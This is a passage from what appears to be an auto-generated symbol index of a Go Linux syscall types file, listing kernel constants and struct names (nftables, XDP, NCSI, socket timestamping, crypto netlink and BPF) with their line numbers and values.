NFTA_CT_HELPER_NAME (line 2375) | NFTA_CT_HELPER_NAME = 0x1 constant NFTA_CT_HELPER_L3PROTO (line 2376) | NFTA_CT_HELPER_L3PROTO = 0x2 constant NFTA_CT_HELPER_L4PROTO (line 2377) | NFTA_CT_HELPER_L4PROTO = 0x3 constant NFTA_OBJ_UNSPEC (line 2378) | NFTA_OBJ_UNSPEC = 0x0 constant NFTA_OBJ_TABLE (line 2379) | NFTA_OBJ_TABLE = 0x1 constant NFTA_OBJ_NAME (line 2380) | NFTA_OBJ_NAME = 0x2 constant NFTA_OBJ_TYPE (line 2381) | NFTA_OBJ_TYPE = 0x3 constant NFTA_OBJ_DATA (line 2382) | NFTA_OBJ_DATA = 0x4 constant NFTA_OBJ_USE (line 2383) | NFTA_OBJ_USE = 0x5 constant NFTA_TRACE_UNSPEC (line 2384) | NFTA_TRACE_UNSPEC = 0x0 constant NFTA_TRACE_TABLE (line 2385) | NFTA_TRACE_TABLE = 0x1 constant NFTA_TRACE_CHAIN (line 2386) | NFTA_TRACE_CHAIN = 0x2 constant NFTA_TRACE_RULE_HANDLE (line 2387) | NFTA_TRACE_RULE_HANDLE = 0x3 constant NFTA_TRACE_TYPE (line 2388) | NFTA_TRACE_TYPE = 0x4 constant NFTA_TRACE_VERDICT (line 2389) | NFTA_TRACE_VERDICT = 0x5 constant NFTA_TRACE_ID (line 2390) | NFTA_TRACE_ID = 0x6 constant NFTA_TRACE_LL_HEADER (line 2391) | NFTA_TRACE_LL_HEADER = 0x7 constant NFTA_TRACE_NETWORK_HEADER (line 2392) | NFTA_TRACE_NETWORK_HEADER = 0x8 constant NFTA_TRACE_TRANSPORT_HEADER (line 2393) | NFTA_TRACE_TRANSPORT_HEADER = 0x9 constant NFTA_TRACE_IIF (line 2394) | NFTA_TRACE_IIF = 0xa constant NFTA_TRACE_IIFTYPE (line 2395) | NFTA_TRACE_IIFTYPE = 0xb constant NFTA_TRACE_OIF (line 2396) | NFTA_TRACE_OIF = 0xc constant NFTA_TRACE_OIFTYPE (line 2397) | NFTA_TRACE_OIFTYPE = 0xd constant NFTA_TRACE_MARK (line 2398) | NFTA_TRACE_MARK = 0xe constant NFTA_TRACE_NFPROTO (line 2399) | NFTA_TRACE_NFPROTO = 0xf constant NFTA_TRACE_POLICY (line 2400) | NFTA_TRACE_POLICY = 0x10 constant NFTA_TRACE_PAD (line 2401) | NFTA_TRACE_PAD = 0x11 constant NFT_TRACETYPE_UNSPEC (line 2402) | NFT_TRACETYPE_UNSPEC = 0x0 constant NFT_TRACETYPE_POLICY (line 2403) | NFT_TRACETYPE_POLICY = 0x1 constant NFT_TRACETYPE_RETURN (line 2404) | NFT_TRACETYPE_RETURN = 0x2 constant NFT_TRACETYPE_RULE (line 2405) | NFT_TRACETYPE_RULE = 0x3 constant NFTA_NG_UNSPEC (line 2406) | NFTA_NG_UNSPEC = 0x0 constant NFTA_NG_DREG (line 2407) | NFTA_NG_DREG = 0x1 constant NFTA_NG_MODULUS (line 2408) | NFTA_NG_MODULUS = 0x2 constant NFTA_NG_TYPE (line 2409) | NFTA_NG_TYPE = 0x3 constant NFTA_NG_OFFSET (line 2410) | NFTA_NG_OFFSET = 0x4 constant NFT_NG_INCREMENTAL (line 2411) | NFT_NG_INCREMENTAL = 0x0 constant NFT_NG_RANDOM (line 2412) | NFT_NG_RANDOM = 0x1 constant NFTA_TARGET_UNSPEC (line 2416) | NFTA_TARGET_UNSPEC = 0x0 constant NFTA_TARGET_NAME (line 2417) | NFTA_TARGET_NAME = 0x1 constant NFTA_TARGET_REV (line 2418) | NFTA_TARGET_REV = 0x2 constant NFTA_TARGET_INFO (line 2419) | NFTA_TARGET_INFO = 0x3 constant NFTA_MATCH_UNSPEC (line 2420) | NFTA_MATCH_UNSPEC = 0x0 constant NFTA_MATCH_NAME (line 2421) | NFTA_MATCH_NAME = 0x1 constant NFTA_MATCH_REV (line 2422) | NFTA_MATCH_REV = 0x2 constant NFTA_MATCH_INFO (line 2423) | NFTA_MATCH_INFO = 0x3 constant NFTA_COMPAT_UNSPEC (line 2424) | NFTA_COMPAT_UNSPEC = 0x0 constant NFTA_COMPAT_NAME (line 2425) | NFTA_COMPAT_NAME = 0x1 constant NFTA_COMPAT_REV (line 2426) | NFTA_COMPAT_REV = 0x2 constant NFTA_COMPAT_TYPE (line 2427) | NFTA_COMPAT_TYPE = 0x3 type RTCTime (line 2430) | type RTCTime struct type RTCWkAlrm (line 2442) | type RTCWkAlrm struct type BlkpgIoctlArg (line 2448) | type BlkpgIoctlArg struct constant BLKPG_ADD_PARTITION (line 2456) | BLKPG_ADD_PARTITION = 0x1 constant BLKPG_DEL_PARTITION (line 2457) | BLKPG_DEL_PARTITION = 0x2 constant BLKPG_RESIZE_PARTITION (line 2458) | BLKPG_RESIZE_PARTITION = 0x3 constant NETNSA_NONE (line 2462) | NETNSA_NONE = 0x0 constant NETNSA_NSID (line 2463) | NETNSA_NSID = 0x1 constant NETNSA_PID (line 2464) | NETNSA_PID = 0x2 constant NETNSA_FD (line 2465) | NETNSA_FD = 0x3 constant NETNSA_TARGET_NSID (line 2466) | NETNSA_TARGET_NSID = 0x4 constant NETNSA_CURRENT_NSID (line 2467) | NETNSA_CURRENT_NSID = 0x5 type XDPRingOffset (line 2470) | type XDPRingOffset struct type XDPMmapOffsets (line 2477) | type XDPMmapOffsets struct type XDPStatistics (line 2484) | type XDPStatistics struct type XDPDesc (line 2493) | type XDPDesc struct constant NCSI_CMD_UNSPEC (line 2500) | NCSI_CMD_UNSPEC = 0x0 constant NCSI_CMD_PKG_INFO (line 2501) | NCSI_CMD_PKG_INFO = 0x1 constant NCSI_CMD_SET_INTERFACE (line 2502) | NCSI_CMD_SET_INTERFACE = 0x2 constant NCSI_CMD_CLEAR_INTERFACE (line 2503) | NCSI_CMD_CLEAR_INTERFACE = 0x3 constant NCSI_ATTR_UNSPEC (line 2504) | NCSI_ATTR_UNSPEC = 0x0 constant NCSI_ATTR_IFINDEX (line 2505) | NCSI_ATTR_IFINDEX = 0x1 constant NCSI_ATTR_PACKAGE_LIST (line 2506) | NCSI_ATTR_PACKAGE_LIST = 0x2 constant NCSI_ATTR_PACKAGE_ID (line 2507) | NCSI_ATTR_PACKAGE_ID = 0x3 constant NCSI_ATTR_CHANNEL_ID (line 2508) | NCSI_ATTR_CHANNEL_ID = 0x4 constant NCSI_PKG_ATTR_UNSPEC (line 2509) | NCSI_PKG_ATTR_UNSPEC = 0x0 constant NCSI_PKG_ATTR (line 2510) | NCSI_PKG_ATTR = 0x1 constant NCSI_PKG_ATTR_ID (line 2511) | NCSI_PKG_ATTR_ID = 0x2 constant NCSI_PKG_ATTR_FORCED (line 2512) | NCSI_PKG_ATTR_FORCED = 0x3 constant NCSI_PKG_ATTR_CHANNEL_LIST (line 2513) | NCSI_PKG_ATTR_CHANNEL_LIST = 0x4 constant NCSI_CHANNEL_ATTR_UNSPEC (line 2514) | NCSI_CHANNEL_ATTR_UNSPEC = 0x0 constant NCSI_CHANNEL_ATTR (line 2515) | NCSI_CHANNEL_ATTR = 0x1 constant NCSI_CHANNEL_ATTR_ID (line 2516) | NCSI_CHANNEL_ATTR_ID = 0x2 constant NCSI_CHANNEL_ATTR_VERSION_MAJOR (line 2517) | NCSI_CHANNEL_ATTR_VERSION_MAJOR = 0x3 constant NCSI_CHANNEL_ATTR_VERSION_MINOR (line 2518) | NCSI_CHANNEL_ATTR_VERSION_MINOR = 0x4 constant NCSI_CHANNEL_ATTR_VERSION_STR (line 2519) | NCSI_CHANNEL_ATTR_VERSION_STR = 0x5 constant NCSI_CHANNEL_ATTR_LINK_STATE (line 2520) | NCSI_CHANNEL_ATTR_LINK_STATE = 0x6 constant NCSI_CHANNEL_ATTR_ACTIVE (line 2521) | NCSI_CHANNEL_ATTR_ACTIVE = 0x7 constant NCSI_CHANNEL_ATTR_FORCED (line 2522) | NCSI_CHANNEL_ATTR_FORCED = 0x8 constant NCSI_CHANNEL_ATTR_VLAN_LIST (line 2523) | NCSI_CHANNEL_ATTR_VLAN_LIST = 0x9 constant NCSI_CHANNEL_ATTR_VLAN_ID (line 2524) | NCSI_CHANNEL_ATTR_VLAN_ID = 0xa type ScmTimestamping (line 2527) | type ScmTimestamping struct constant SOF_TIMESTAMPING_TX_HARDWARE (line 2532) | SOF_TIMESTAMPING_TX_HARDWARE = 0x1 constant SOF_TIMESTAMPING_TX_SOFTWARE (line 2533) | SOF_TIMESTAMPING_TX_SOFTWARE = 0x2 constant SOF_TIMESTAMPING_RX_HARDWARE (line 2534) | SOF_TIMESTAMPING_RX_HARDWARE = 0x4 constant SOF_TIMESTAMPING_RX_SOFTWARE (line 2535) | SOF_TIMESTAMPING_RX_SOFTWARE = 0x8 constant SOF_TIMESTAMPING_SOFTWARE (line 2536) | SOF_TIMESTAMPING_SOFTWARE = 0x10 constant SOF_TIMESTAMPING_SYS_HARDWARE (line 2537) | SOF_TIMESTAMPING_SYS_HARDWARE = 0x20 constant SOF_TIMESTAMPING_RAW_HARDWARE (line 2538) | SOF_TIMESTAMPING_RAW_HARDWARE = 0x40 constant SOF_TIMESTAMPING_OPT_ID (line 2539) | SOF_TIMESTAMPING_OPT_ID = 0x80 constant SOF_TIMESTAMPING_TX_SCHED (line 2540) | SOF_TIMESTAMPING_TX_SCHED = 0x100 constant SOF_TIMESTAMPING_TX_ACK (line 2541) | SOF_TIMESTAMPING_TX_ACK = 0x200 constant SOF_TIMESTAMPING_OPT_CMSG (line 2542) | SOF_TIMESTAMPING_OPT_CMSG = 0x400 constant SOF_TIMESTAMPING_OPT_TSONLY (line 2543) | SOF_TIMESTAMPING_OPT_TSONLY = 0x800 constant SOF_TIMESTAMPING_OPT_STATS (line 2544) | SOF_TIMESTAMPING_OPT_STATS = 0x1000 constant SOF_TIMESTAMPING_OPT_PKTINFO (line 2545) | SOF_TIMESTAMPING_OPT_PKTINFO = 0x2000 constant SOF_TIMESTAMPING_OPT_TX_SWHW (line 2546) | SOF_TIMESTAMPING_OPT_TX_SWHW = 0x4000 constant SOF_TIMESTAMPING_BIND_PHC (line 2547) | SOF_TIMESTAMPING_BIND_PHC = 0x8000 constant SOF_TIMESTAMPING_OPT_ID_TCP (line 2548) | SOF_TIMESTAMPING_OPT_ID_TCP = 0x10000 constant SOF_TIMESTAMPING_LAST (line 2550) | SOF_TIMESTAMPING_LAST = 0x10000 constant SOF_TIMESTAMPING_MASK (line 2551) | SOF_TIMESTAMPING_MASK = 0x1ffff constant SCM_TSTAMP_SND (line 2553) | SCM_TSTAMP_SND = 0x0 constant SCM_TSTAMP_SCHED (line 2554) | SCM_TSTAMP_SCHED = 0x1 constant SCM_TSTAMP_ACK (line 2555) | SCM_TSTAMP_ACK = 0x2 type SockExtendedErr (line 2558) | type SockExtendedErr struct type FanotifyEventMetadata (line 2568) | type FanotifyEventMetadata struct type FanotifyResponse (line 2578) | type FanotifyResponse struct constant CRYPTO_MSG_BASE (line 2584) | CRYPTO_MSG_BASE = 0x10 constant CRYPTO_MSG_NEWALG (line 2585) | CRYPTO_MSG_NEWALG = 0x10 constant CRYPTO_MSG_DELALG (line 2586) | CRYPTO_MSG_DELALG = 0x11 constant CRYPTO_MSG_UPDATEALG (line 2587) | CRYPTO_MSG_UPDATEALG = 0x12 constant CRYPTO_MSG_GETALG (line 2588) | CRYPTO_MSG_GETALG = 0x13 constant CRYPTO_MSG_DELRNG (line 2589) | CRYPTO_MSG_DELRNG = 0x14 constant CRYPTO_MSG_GETSTAT (line 2590) | CRYPTO_MSG_GETSTAT = 0x15 constant CRYPTOCFGA_UNSPEC (line 2594) | CRYPTOCFGA_UNSPEC = 0x0 constant CRYPTOCFGA_PRIORITY_VAL (line 2595) | CRYPTOCFGA_PRIORITY_VAL = 0x1 constant CRYPTOCFGA_REPORT_LARVAL (line 2596) | CRYPTOCFGA_REPORT_LARVAL = 0x2 constant CRYPTOCFGA_REPORT_HASH (line 2597) | CRYPTOCFGA_REPORT_HASH = 0x3 constant CRYPTOCFGA_REPORT_BLKCIPHER (line 2598) | CRYPTOCFGA_REPORT_BLKCIPHER = 0x4 constant CRYPTOCFGA_REPORT_AEAD (line 2599) | CRYPTOCFGA_REPORT_AEAD = 0x5 constant CRYPTOCFGA_REPORT_COMPRESS (line 2600) | CRYPTOCFGA_REPORT_COMPRESS = 0x6 constant CRYPTOCFGA_REPORT_RNG (line 2601) | CRYPTOCFGA_REPORT_RNG = 0x7 constant CRYPTOCFGA_REPORT_CIPHER (line 2602) | CRYPTOCFGA_REPORT_CIPHER = 0x8 constant CRYPTOCFGA_REPORT_AKCIPHER (line 2603) | CRYPTOCFGA_REPORT_AKCIPHER = 0x9 constant CRYPTOCFGA_REPORT_KPP (line 2604) | CRYPTOCFGA_REPORT_KPP = 0xa constant CRYPTOCFGA_REPORT_ACOMP (line 2605) | CRYPTOCFGA_REPORT_ACOMP = 0xb constant CRYPTOCFGA_STAT_LARVAL (line 2606) | CRYPTOCFGA_STAT_LARVAL = 0xc constant CRYPTOCFGA_STAT_HASH (line 2607) | CRYPTOCFGA_STAT_HASH = 0xd constant CRYPTOCFGA_STAT_BLKCIPHER (line 2608) | CRYPTOCFGA_STAT_BLKCIPHER = 0xe constant CRYPTOCFGA_STAT_AEAD (line 2609) | CRYPTOCFGA_STAT_AEAD = 0xf constant CRYPTOCFGA_STAT_COMPRESS (line 2610) | CRYPTOCFGA_STAT_COMPRESS = 0x10 constant CRYPTOCFGA_STAT_RNG (line 2611) | CRYPTOCFGA_STAT_RNG = 0x11 constant CRYPTOCFGA_STAT_CIPHER (line 2612) | CRYPTOCFGA_STAT_CIPHER = 0x12 constant CRYPTOCFGA_STAT_AKCIPHER (line 2613) | CRYPTOCFGA_STAT_AKCIPHER = 0x13 constant CRYPTOCFGA_STAT_KPP (line 2614) | CRYPTOCFGA_STAT_KPP = 0x14 constant CRYPTOCFGA_STAT_ACOMP (line 2615) | CRYPTOCFGA_STAT_ACOMP = 0x15 constant BPF_REG_0 (line 2619) | BPF_REG_0 = 0x0 constant BPF_REG_1 (line 2620) | BPF_REG_1 = 0x1 constant BPF_REG_2 (line 2621) | BPF_REG_2 = 0x2 constant BPF_REG_3 (line 2622) | BPF_REG_3 = 0x3 constant BPF_REG_4 (line 2623) | BPF_REG_4 = 0x4 constant BPF_REG_5 (line 2624) | BPF_REG_5 = 0x5 constant BPF_REG_6 (line 2625) | BPF_REG_6 = 0x6 constant BPF_REG_7 (line 2626) | BPF_REG_7 = 0x7 constant BPF_REG_8 (line 2627) | BPF_REG_8 = 0x8 constant BPF_REG_9 (line 2628) | BPF_REG_9 = 0x9 constant BPF_REG_10 (line 2629) | BPF_REG_10 = 0xa constant BPF_CGROUP_ITER_ORDER_UNSPEC (line 2630) | BPF_CGROUP_ITER_ORDER_UNSPEC = 0x0 constant BPF_CGROUP_ITER_SELF_ONLY (line 2631) | BPF_CGROUP_ITER_SELF_ONLY = 0x1 constant BPF_CGROUP_ITER_DESCENDANTS_PRE (line 2632) | BPF_CGROUP_ITER_DESCENDANTS_PRE = 0x2 constant BPF_CGROUP_ITER_DESCENDANTS_POST (line 2633) | BPF_CGROUP_ITER_DESCENDANTS_POST = 0x3 constant BPF_CGROUP_ITER_ANCESTORS_UP (line 2634) | BPF_CGROUP_ITER_ANCESTORS_UP = 0x4 constant BPF_MAP_CREATE (line 2635) | BPF_MAP_CREATE = 0x0 constant BPF_MAP_LOOKUP_ELEM (line 2636) | BPF_MAP_LOOKUP_ELEM = 0x1 constant BPF_MAP_UPDATE_ELEM (line 2637) | BPF_MAP_UPDATE_ELEM = 0x2 constant BPF_MAP_DELETE_ELEM (line 2638) | BPF_MAP_DELETE_ELEM = 0x3 constant BPF_MAP_GET_NEXT_KEY (line 2639) | BPF_MAP_GET_NEXT_KEY = 0x4 constant BPF_PROG_LOAD (line 2640) | BPF_PROG_LOAD = 0x5 constant BPF_OBJ_PIN (line 2641) | BPF_OBJ_PIN = 0x6 constant BPF_OBJ_GET (line 2642) | BPF_OBJ_GET = 0x7 constant BPF_PROG_ATTACH (line 2643) | BPF_PROG_ATTACH = 0x8 constant BPF_PROG_DETACH (line 2644) | BPF_PROG_DETACH = 0x9 constant BPF_PROG_TEST_RUN (line 2645) | BPF_PROG_TEST_RUN = 0xa constant BPF_PROG_RUN (line 2646) | BPF_PROG_RUN = 0xa constant BPF_PROG_GET_NEXT_ID (line 2647) | BPF_PROG_GET_NEXT_ID = 0xb constant BPF_MAP_GET_NEXT_ID (line 2648) | BPF_MAP_GET_NEXT_ID = 0xc constant BPF_PROG_GET_FD_BY_ID (line 2649) | BPF_PROG_GET_FD_BY_ID = 0xd constant BPF_MAP_GET_FD_BY_ID (line 2650) | BPF_MAP_GET_FD_BY_ID = 0xe constant BPF_OBJ_GET_INFO_BY_FD (line 2651) | BPF_OBJ_GET_INFO_BY_FD = 0xf constant BPF_PROG_QUERY (line 2652) | BPF_PROG_QUERY = 0x10 constant BPF_RAW_TRACEPOINT_OPEN (line 2653) | BPF_RAW_TRACEPOINT_OPEN = 0x11 constant BPF_BTF_LOAD (line 2654) | BPF_BTF_LOAD = 0x12 constant BPF_BTF_GET_FD_BY_ID (line 2655) | BPF_BTF_GET_FD_BY_ID = 0x13 constant BPF_TASK_FD_QUERY (line 2656) | BPF_TASK_FD_QUERY = 0x14 constant BPF_MAP_LOOKUP_AND_DELETE_ELEM (line 2657) | BPF_MAP_LOOKUP_AND_DELETE_ELEM = 0x15 constant BPF_MAP_FREEZE (line 2658) | BPF_MAP_FREEZE = 0x16 constant BPF_BTF_GET_NEXT_ID (line 2659) | BPF_BTF_GET_NEXT_ID = 0x17 constant BPF_MAP_LOOKUP_BATCH (line 2660) | BPF_MAP_LOOKUP_BATCH = 0x18 constant BPF_MAP_LOOKUP_AND_DELETE_BATCH (line 2661) | BPF_MAP_LOOKUP_AND_DELETE_BATCH = 0x19 constant BPF_MAP_UPDATE_BATCH (line 2662) | BPF_MAP_UPDATE_BATCH = 0x1a constant BPF_MAP_DELETE_BATCH (line 2663) | BPF_MAP_DELETE_BATCH = 0x1b constant BPF_LINK_CREATE (line 2664) | BPF_LINK_CREATE = 0x1c constant BPF_LINK_UPDATE (line 2665) | BPF_LINK_UPDATE = 0x1d constant BPF_LINK_GET_FD_BY_ID (line 2666) | BPF_LINK_GET_FD_BY_ID = 0x1e constant BPF_LINK_GET_NEXT_ID (line 2667) | BPF_LINK_GET_NEXT_ID = 0x1f constant BPF_ENABLE_STATS (line 2668) | BPF_ENABLE_STATS = 0x20 constant BPF_ITER_CREATE (line 2669) | BPF_ITER_CREATE = 0x21 constant BPF_LINK_DETACH (line 2670) | BPF_LINK_DETACH = 0x22 constant BPF_PROG_BIND_MAP (line 2671) | BPF_PROG_BIND_MAP = 0x23 constant BPF_MAP_TYPE_UNSPEC (line 2672) | BPF_MAP_TYPE_UNSPEC = 0x0 constant BPF_MAP_TYPE_HASH (line 2673) | BPF_MAP_TYPE_HASH = 0x1 constant BPF_MAP_TYPE_ARRAY (line 2674) | BPF_MAP_TYPE_ARRAY = 0x2 constant BPF_MAP_TYPE_PROG_ARRAY (line 2675) | BPF_MAP_TYPE_PROG_ARRAY = 0x3 constant BPF_MAP_TYPE_PERF_EVENT_ARRAY (line 2676) | BPF_MAP_TYPE_PERF_EVENT_ARRAY = 0x4 constant BPF_MAP_TYPE_PERCPU_HASH (line 2677) | BPF_MAP_TYPE_PERCPU_HASH = 0x5 constant BPF_MAP_TYPE_PERCPU_ARRAY (line 2678) | BPF_MAP_TYPE_PERCPU_ARRAY = 0x6 constant BPF_MAP_TYPE_STACK_TRACE (line 2679) | BPF_MAP_TYPE_STACK_TRACE = 0x7 constant BPF_MAP_TYPE_CGROUP_ARRAY (line 2680) | BPF_MAP_TYPE_CGROUP_ARRAY = 0x8 constant BPF_MAP_TYPE_LRU_HASH (line 2681) | BPF_MAP_TYPE_LRU_HASH = 0x9 constant BPF_MAP_TYPE_LRU_PERCPU_HASH (line 2682) | BPF_MAP_TYPE_LRU_PERCPU_HASH = 0xa constant BPF_MAP_TYPE_LPM_TRIE (line 2683) | BPF_MAP_TYPE_LPM_TRIE = 0xb constant BPF_MAP_TYPE_ARRAY_OF_MAPS (line 2684) | BPF_MAP_TYPE_ARRAY_OF_MAPS = 0xc constant BPF_MAP_TYPE_HASH_OF_MAPS (line 2685) | BPF_MAP_TYPE_HASH_OF_MAPS = 0xd constant BPF_MAP_TYPE_DEVMAP (line 2686) | BPF_MAP_TYPE_DEVMAP = 0xe constant BPF_MAP_TYPE_SOCKMAP (line 2687) | BPF_MAP_TYPE_SOCKMAP = 0xf constant BPF_MAP_TYPE_CPUMAP (line 2688) | BPF_MAP_TYPE_CPUMAP = 0x10 constant BPF_MAP_TYPE_XSKMAP (line 2689) | BPF_MAP_TYPE_XSKMAP = 0x11 constant BPF_MAP_TYPE_SOCKHASH (line 2690) | BPF_MAP_TYPE_SOCKHASH = 0x12 constant BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED (line 2691) | BPF_MAP_TYPE_CGROUP_STORAGE_DEPRECATED = 0x13 constant BPF_MAP_TYPE_CGROUP_STORAGE (line 2692) | BPF_MAP_TYPE_CGROUP_STORAGE = 0x13 constant BPF_MAP_TYPE_REUSEPORT_SOCKARRAY (line 2693) | BPF_MAP_TYPE_REUSEPORT_SOCKARRAY = 0x14 constant BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE (line 2694) | BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE = 0x15 constant BPF_MAP_TYPE_QUEUE (line 2695) | BPF_MAP_TYPE_QUEUE = 0x16 constant BPF_MAP_TYPE_STACK (line 2696) | BPF_MAP_TYPE_STACK = 0x17 constant BPF_MAP_TYPE_SK_STORAGE (line 2697) | BPF_MAP_TYPE_SK_STORAGE = 0x18 constant BPF_MAP_TYPE_DEVMAP_HASH (line 2698) | BPF_MAP_TYPE_DEVMAP_HASH = 0x19 constant BPF_MAP_TYPE_STRUCT_OPS (line 2699) | BPF_MAP_TYPE_STRUCT_OPS = 0x1a constant BPF_MAP_TYPE_RINGBUF (line 2700) | BPF_MAP_TYPE_RINGBUF = 0x1b constant BPF_MAP_TYPE_INODE_STORAGE (line 2701) | BPF_MAP_TYPE_INODE_STORAGE = 0x1c constant BPF_MAP_TYPE_TASK_STORAGE (line 2702) | BPF_MAP_TYPE_TASK_STORAGE = 0x1d constant BPF_MAP_TYPE_BLOOM_FILTER (line 2703) | BPF_MAP_TYPE_BLOOM_FILTER = 0x1e constant BPF_MAP_TYPE_USER_RINGBUF (line 2704) | BPF_MAP_TYPE_USER_RINGBUF = 0x1f constant BPF_MAP_TYPE_CGRP_STORAGE (line 2705) | BPF_MAP_TYPE_CGRP_STORAGE = 0x20 constant BPF_PROG_TYPE_UNSPEC (line 2706) | BPF_PROG_TYPE_UNSPEC = 0x0 constant BPF_PROG_TYPE_SOCKET_FILTER (line 2707) | BPF_PROG_TYPE_SOCKET_FILTER = 0x1 constant BPF_PROG_TYPE_KPROBE (line 2708) | BPF_PROG_TYPE_KPROBE = 0x2 constant BPF_PROG_TYPE_SCHED_CLS (line 2709) | BPF_PROG_TYPE_SCHED_CLS = 0x3 constant BPF_PROG_TYPE_SCHED_ACT (line 2710) | BPF_PROG_TYPE_SCHED_ACT = 0x4 constant BPF_PROG_TYPE_TRACEPOINT (line 2711) | BPF_PROG_TYPE_TRACEPOINT = 0x5 constant BPF_PROG_TYPE_XDP (line 2712) | BPF_PROG_TYPE_XDP = 0x6 constant BPF_PROG_TYPE_PERF_EVENT (line 2713) | BPF_PROG_TYPE_PERF_EVENT = 0x7 constant BPF_PROG_TYPE_CGROUP_SKB (line 2714) | BPF_PROG_TYPE_CGROUP_SKB = 0x8 constant BPF_PROG_TYPE_CGROUP_SOCK (line 2715) | BPF_PROG_TYPE_CGROUP_SOCK = 0x9 constant BPF_PROG_TYPE_LWT_IN (line 2716) | BPF_PROG_TYPE_LWT_IN = 0xa constant BPF_PROG_TYPE_LWT_OUT (line 2717) | BPF_PROG_TYPE_LWT_OUT = 0xb constant BPF_PROG_TYPE_LWT_XMIT (line 2718) | BPF_PROG_TYPE_LWT_XMIT = 0xc constant BPF_PROG_TYPE_SOCK_OPS (line 2719) | BPF_PROG_TYPE_SOCK_OPS = 0xd constant BPF_PROG_TYPE_SK_SKB (line 2720) | BPF_PROG_TYPE_SK_SKB = 0xe constant BPF_PROG_TYPE_CGROUP_DEVICE (line 2721) | BPF_PROG_TYPE_CGROUP_DEVICE = 0xf constant BPF_PROG_TYPE_SK_MSG (line 2722) | BPF_PROG_TYPE_SK_MSG = 0x10 constant BPF_PROG_TYPE_RAW_TRACEPOINT (line 2723) | BPF_PROG_TYPE_RAW_TRACEPOINT = 0x11 constant BPF_PROG_TYPE_CGROUP_SOCK_ADDR (line 2724) | BPF_PROG_TYPE_CGROUP_SOCK_ADDR = 0x12 constant BPF_PROG_TYPE_LWT_SEG6LOCAL (line 2725) | BPF_PROG_TYPE_LWT_SEG6LOCAL = 0x13 constant BPF_PROG_TYPE_LIRC_MODE2 (line 2726) | BPF_PROG_TYPE_LIRC_MODE2 = 0x14 constant BPF_PROG_TYPE_SK_REUSEPORT (line 2727) | BPF_PROG_TYPE_SK_REUSEPORT = 0x15 constant BPF_PROG_TYPE_FLOW_DISSECTOR (line 2728) | BPF_PROG_TYPE_FLOW_DISSECTOR = 0x16 constant BPF_PROG_TYPE_CGROUP_SYSCTL (line 2729) | BPF_PROG_TYPE_CGROUP_SYSCTL = 0x17 constant BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE (line 2730) | BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE = 0x18 constant BPF_PROG_TYPE_CGROUP_SOCKOPT (line 2731) | BPF_PROG_TYPE_CGROUP_SOCKOPT = 0x19 constant BPF_PROG_TYPE_TRACING (line 2732) | BPF_PROG_TYPE_TRACING = 0x1a constant BPF_PROG_TYPE_STRUCT_OPS (line 2733) | BPF_PROG_TYPE_STRUCT_OPS = 0x1b constant BPF_PROG_TYPE_EXT (line 2734) | BPF_PROG_TYPE_EXT = 0x1c constant BPF_PROG_TYPE_LSM (line 2735) | BPF_PROG_TYPE_LSM = 0x1d constant BPF_PROG_TYPE_SK_LOOKUP (line 2736) | BPF_PROG_TYPE_SK_LOOKUP = 0x1e constant BPF_PROG_TYPE_SYSCALL (line 2737) | BPF_PROG_TYPE_SYSCALL = 0x1f constant BPF_PROG_TYPE_NETFILTER (line 2738) | BPF_PROG_TYPE_NETFILTER = 0x20 constant BPF_CGROUP_INET_INGRESS (line 2739) | BPF_CGROUP_INET_INGRESS = 0x0 constant BPF_CGROUP_INET_EGRESS (line 2740) | BPF_CGROUP_INET_EGRESS = 0x1 constant BPF_CGROUP_INET_SOCK_CREATE (line 2741) | BPF_CGROUP_INET_SOCK_CREATE = 0x2 constant BPF_CGROUP_SOCK_OPS (line 2742) | BPF_CGROUP_SOCK_OPS = 0x3 constant BPF_SK_SKB_STREAM_PARSER (line 2743) | BPF_SK_SKB_STREAM_PARSER = 0x4 constant BPF_SK_SKB_STREAM_VERDICT (line 2744) | BPF_SK_SKB_STREAM_VERDICT = 0x5 constant BPF_CGROUP_DEVICE (line 2745) | BPF_CGROUP_DEVICE = 0x6 constant BPF_SK_MSG_VERDICT (line 2746) | BPF_SK_MSG_VERDICT = 0x7 constant BPF_CGROUP_INET4_BIND (line 2747) | BPF_CGROUP_INET4_BIND = 0x8 constant BPF_CGROUP_INET6_BIND (line 2748) | BPF_CGROUP_INET6_BIND = 0x9 constant BPF_CGROUP_INET4_CONNECT (line 2749) | BPF_CGROUP_INET4_CONNECT = 0xa constant BPF_CGROUP_INET6_CONNECT (line 2750) | BPF_CGROUP_INET6_CONNECT = 0xb constant BPF_CGROUP_INET4_POST_BIND (line 2751) | BPF_CGROUP_INET4_POST_BIND = 0xc constant BPF_CGROUP_INET6_POST_BIND (line 2752) | BPF_CGROUP_INET6_POST_BIND = 0xd constant BPF_CGROUP_UDP4_SENDMSG (line 2753) | BPF_CGROUP_UDP4_SENDMSG = 0xe constant BPF_CGROUP_UDP6_SENDMSG (line 2754) | BPF_CGROUP_UDP6_SENDMSG = 0xf constant BPF_LIRC_MODE2 (line 2755) | BPF_LIRC_MODE2 = 0x10 constant BPF_FLOW_DISSECTOR (line 2756) | BPF_FLOW_DISSECTOR = 0x11 constant BPF_CGROUP_SYSCTL (line 2757) | BPF_CGROUP_SYSCTL = 0x12 constant BPF_CGROUP_UDP4_RECVMSG (line 2758) | BPF_CGROUP_UDP4_RECVMSG = 0x13 constant BPF_CGROUP_UDP6_RECVMSG (line 2759) | BPF_CGROUP_UDP6_RECVMSG = 0x14 constant BPF_CGROUP_GETSOCKOPT (line 2760) | BPF_CGROUP_GETSOCKOPT = 0x15 constant BPF_CGROUP_SETSOCKOPT (line 2761) | BPF_CGROUP_SETSOCKOPT = 0x16 constant BPF_TRACE_RAW_TP (line 2762) | BPF_TRACE_RAW_TP = 0x17 constant BPF_TRACE_FENTRY (line 2763) | BPF_TRACE_FENTRY = 0x18 constant BPF_TRACE_FEXIT (line 2764) | BPF_TRACE_FEXIT = 0x19 constant BPF_MODIFY_RETURN (line 2765) | BPF_MODIFY_RETURN = 0x1a constant BPF_LSM_MAC (line 2766) | BPF_LSM_MAC = 0x1b constant BPF_TRACE_ITER (line 2767) | BPF_TRACE_ITER = 0x1c constant BPF_CGROUP_INET4_GETPEERNAME (line 2768) | BPF_CGROUP_INET4_GETPEERNAME = 0x1d constant BPF_CGROUP_INET6_GETPEERNAME (line 2769) | BPF_CGROUP_INET6_GETPEERNAME = 0x1e constant BPF_CGROUP_INET4_GETSOCKNAME (line 2770) 